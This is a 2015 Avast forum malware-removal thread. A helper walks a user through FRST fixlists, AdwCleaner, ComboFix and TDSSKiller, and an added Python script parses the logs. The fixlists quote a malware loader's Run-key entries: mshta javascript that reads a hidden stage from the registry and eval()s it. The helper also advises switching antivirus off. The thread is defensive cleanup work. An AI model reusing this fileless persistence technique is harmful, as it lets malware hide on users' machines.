Author Topic: Infection blocked Constant messages.  (Read 10422 times)


REDACTED

  • Guest
Infection blocked Constant messages.
« on: July 23, 2015, 09:14:18 PM »
I keep getting the above. The message contains these:

URL: http://filter.infinity-info.com/filter?q=%7Bquery&i=qsgAPfw0I1o_1&t=1204682193

Infection: URL:Mal2

Process: C:\Program Files\Internet Explorer\iexplore.exe

I have run Full Scan & Boot time scans. I uninstalled Internet Explorer from day one and even deleted the contents of the Internet Explorer folder mentioned in the message bar for 2 dlls - ieproxy.dll & sqmapi.dll which I have been unable to remove even after taking ownership of them.

Would appreciate some advice on how to stop this nightmare. First time ever in many years of Avast use that I've encountered such an issue.

Thanks

Joaquin

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #1 on: July 23, 2015, 09:19:13 PM »
Could you screenshot the Avast popup please

Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
 
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Select  additions at the bottom
  • Press Scan button.

  • It will produce a log called FRST.txt in the same directory the tool is run from. 
  • Please attach both logs generated.

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #2 on: July 24, 2015, 10:45:53 PM »
Sorry for the delay getting back.
Logs and screenshot attached.

Thanks


Joaquin
« Last Edit: July 25, 2015, 08:15:04 PM by skywreck »

Offline essexboy

Re: Infection blocked Constant messages.
« Reply #3 on: July 24, 2015, 11:15:26 PM »
This probably came from one of your torrented movies

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 
Quote
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:LDvUT1uG="J4";bq3=new%20ActiveXObject("WScript.Shell");zKSEG9Se="hlG5kdljkX";Dc3K0E=bq3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");klTB8VpgQ="q";eval(Dc3K0E);K5cW9em (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [EEDSpeedLauncher] => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:WmyABn1BA0="YGDl";wN7=new%20ActiveXObject("WScript.Shell");Lpi4jqN4="UY3";qC4sm2=wN7.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");TVDlVH1="BVV88jRnqS";eval(qC4sm2);QSLnTBa8F="ZfZml (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {B1C519C5-8E0B-4901-8A28-C3DEDC5AC32E} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
U3 aiiiti6k; C:\Windows\System32\Drivers\aiiiti6k.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that
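
The Run entries in the fix above show a fileless persistence pattern: mshta is started with an inline javascript: URI that uses WScript.Shell.RegRead to pull a second stage out of a registry value and eval() it, so nothing under Program Files needs to survive, which is why deleting the two DLLs changed nothing and why the fix ends with DeleteKey lines. The triage script below is an added example, not part of this thread or of FRST; it parses FRST-style Run-key lines (the sample lines are copied from the fixlist above), flags that pattern plus value names FRST cannot display and zero-byte drivers, and recovers the registry key that the DeleteKey lines target. The function and class names are the example's own.

```python
"""Triage helper for FRST-style Run-key lines (added example, not the thread's
or FRST's own code). Flags: mshta + inline javascript:, a second stage read
from the registry and eval()'d, value names with characters regedit cannot
handle, and zero-byte driver files."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# FRST "Run" entry layout:  <key>\...\Run: [<value name>] => <command>
RUN_LINE = re.compile(r"^(?P<key>.+?\\Run): \[(?P<name>[^\]]*)\] => (?P<cmd>.*)$")
# FRST driver entry whose file is empty:  U3 <svc>; <path>.sys [0 ] (...) <==== ATTENTION
ZERO_BYTE_DRIVER = re.compile(r"^\S+ (?P<svc>[^;]+); (?P<path>\S+\.sys) \[0 \]")
# Argument of WScript.Shell.RegRead("...") inside the inline script (JS string, backslashes doubled)
REGREAD_ARG = re.compile(r'RegRead\("((?:[^"\\]|\\.)*)"\)')
# A legitimate Run value name has no need for these characters
INVALID_NAME_CHARS = re.compile(r'[*<>|?"]')


@dataclass
class Finding:
    line: str
    reasons: List[str] = field(default_factory=list)
    payload_key: Optional[str] = None    # registry key that stores the eval()'d stage
    payload_value: Optional[str] = None  # value name under that key


def analyse_run_entry(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious Run entry, None for a clean or non-Run line."""
    m = RUN_LINE.match(line)
    if not m:
        return None
    name, cmd = m["name"], m["cmd"]
    f = Finding(line=line)
    if INVALID_NAME_CHARS.search(name):
        f.reasons.append("value name contains characters regedit cannot handle")
    if re.match(r"mshta\s+javascript:", cmd, re.IGNORECASE):
        f.reasons.append("mshta launched with an inline javascript: URI (no script file on disk)")
    rr = REGREAD_ARG.search(cmd)
    if rr and "eval(" in cmd:
        # Undo the JS string escaping, then split "<key>\<value>" at the last backslash
        full = rr.group(1).replace("\\\\", "\\")
        f.payload_key, _, f.payload_value = full.rpartition("\\")
        f.reasons.append("second stage read from the registry and eval()'d")
    return f if f.reasons else None


def triage(lines) -> List[Finding]:
    findings = []
    for line in lines:
        f = analyse_run_entry(line)
        if f:
            findings.append(f)
            continue
        d = ZERO_BYTE_DRIVER.match(line)
        if d:
            findings.append(Finding(line=line, reasons=[
                f"zero-byte driver {d['path']} registered as service {d['svc']}"]))
    return findings


def payload_keys(findings) -> List[str]:
    """Registry keys holding the second stage: the keys a DeleteKey: line must remove."""
    return sorted({f.payload_key for f in findings if f.payload_key})


# Sample input: lines copied from the FRST fixlist in this thread.
SAMPLE_LOG = r'''
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:LDvUT1uG="J4";bq3=new%20ActiveXObject("WScript.Shell");zKSEG9Se="hlG5kdljkX";Dc3K0E=bq3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");klTB8VpgQ="q";eval(Dc3K0E);K5cW9em (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [EEDSpeedLauncher] => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:WmyABn1BA0="YGDl";wN7=new%20ActiveXObject("WScript.Shell");Lpi4jqN4="UY3";qC4sm2=wN7.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");TVDlVH1="BVV88jRnqS";eval(qC4sm2);QSLnTBa8F="ZfZml (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493
U3 aiiiti6k; C:\Windows\System32\Drivers\aiiiti6k.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
'''.strip().splitlines()

if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for r in results:
        print(r.line[:70] + "...")
        for reason in r.reasons:
            print("   -", reason)
    print("Registry keys holding the payload:", payload_keys(results))
```

The script only reads log text; it never touches the registry itself. Running it on the sample prints four findings (three mshta entries and the zero-byte driver) and the two keys that the DeleteKey: lines in the fix remove, while the EEDSpeedLauncher entry, which runs an ordinary DLL from disk, is left alone.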

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #4 on: July 25, 2015, 01:48:21 AM »
Thanks for your help. I did as instructed and the log is attached. However, pop-ups continue.

Joaquin

Offline essexboy

Re: Infection blocked Constant messages.
« Reply #5 on: July 25, 2015, 12:29:42 PM »
Could I have a fresh FRST scan please

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean".
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S0].txt as well.

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #6 on: July 26, 2015, 10:18:42 AM »
Done as instructed. See attached.

Much obliged for your help with all this.

Regards


Joaquin

Pop ups continue.
« Last Edit: July 26, 2015, 12:15:03 PM by skywreck »

Offline essexboy

Re: Infection blocked Constant messages.
« Reply #7 on: July 26, 2015, 12:27:15 PM »
Hmm, the exact same infection is showing, let's try once more

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 
Quote
CreateRestorePoint:
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:MM6YG3zKFz="UqC9I";m8g2=new%20ActiveXObject("WScript.Shell");GGMcA9Lr="uTNbxYW";RdsV89=m8g2.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");akfWMd2lF="4xtLoV7";eval(RdsV8 (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:CY92tCCLnU="Oxlq5";k89k=new%20ActiveXObject("WScript.Shell");D1vHYMFcu="Vs";HUX4o5=k89k.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");q8CxhVuml="ox";eval(HUX4o5);WPSGc5 (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:KW3zbLY="Ecdu260TGk";c8K1=new%20ActiveXObject("WScript.Shell");VoHdg6jDS="ckvS2tBx";w1SX4s=c8K1.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");NK6ft7kv="xoUxfLX7m";eval(w1SX4s);gP22F (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
U3 ar5yet3c; C:\Windows\System32\Drivers\ar5yet3c.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [Amazon Music] => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Download and Install Combofix
 
Download ComboFix from one of the following locations:
Link 1
Link 2
 
VERY IMPORTANT !!! Save ComboFix.exe to your Desktop
 
* IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here
  • Double click on ComboFix.exe & follow the prompts.
  • Accept the disclaimer and allow to update if it asks
  • When finished, it shall produce a log for you.
  • Please include the C:\ComboFix.txt in your next reply.
Notes:
1. Do not mouse-click Combofix's window while it is running. That may cause it to stall.
2. Do not "re-run" Combofix. If you have a problem, reply back for further instructions.
3. If after the reboot you get errors about programmes being marked for deletion, then reboot; that will cure it.


Please make sure you include the combo fix log in your next reply as well as describe how your computer is running now

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #8 on: July 26, 2015, 03:16:04 PM »
Followed the instructions to the letter. Did a FSRT scan and log file attached. Then ran ComboFix which scanned and then rebooted after completion, on returning to the Desktop another window opened and started to create a log file, unfortunately it came up with an error because of disk error, damaged or something like that. I was unable to take a screenshot because my was sort of frozen and had to reboot once more. I've only had one pop up for the last hour or so.

Offline essexboy

Re: Infection blocked Constant messages.
« Reply #9 on: July 26, 2015, 03:17:52 PM »
OK could I have a fresh FRST scan please so that I can be sure the malware has gone

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #10 on: July 26, 2015, 03:32:14 PM »
Still getting pop-ups

Attached screenshot of pop-up and new Scan.

Offline essexboy

Re: Infection blocked Constant messages.
« Reply #11 on: July 26, 2015, 04:34:01 PM »
OK the only thing I can think of at the moment is that an MBR type rootkit is re-installing after I am removing it

So I will check that out.  Are you downloading anything after running the FRST fix ?

Download the latest version of TDSSKiller from here and save it to your Desktop.

  • Doubleclick on TDSSKiller.exe to run the application
  • Then click on Change parameters.
  • Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects, then click OK.
  • Click the Start Scan button.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
  • Get the report by selecting Reports
  • Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
Please copy and paste its contents on your next reply.

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #12 on: July 26, 2015, 05:24:21 PM »
Nothing found but a pop up came up while it was scanning. - Probably best thing for me is to back-up and rebuild.

Extremely grateful for your help. If you were really in Essex I'd buy a pint!

Bests


Joaquin

Offline essexboy

Re: Infection blocked Constant messages.
« Reply #13 on: July 26, 2015, 05:59:47 PM »
Do you have anything on your system that is protecting the registry as that is where the malware is hiding

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #14 on: July 26, 2015, 10:21:18 PM »
Sorry for the delay. I checked the services and Windows Defender was active so I switched it off, ran Adwcleaner followed by Combofix and after the reboots no more pop ups. All going well for a number of hours.

Thanks


Joaquin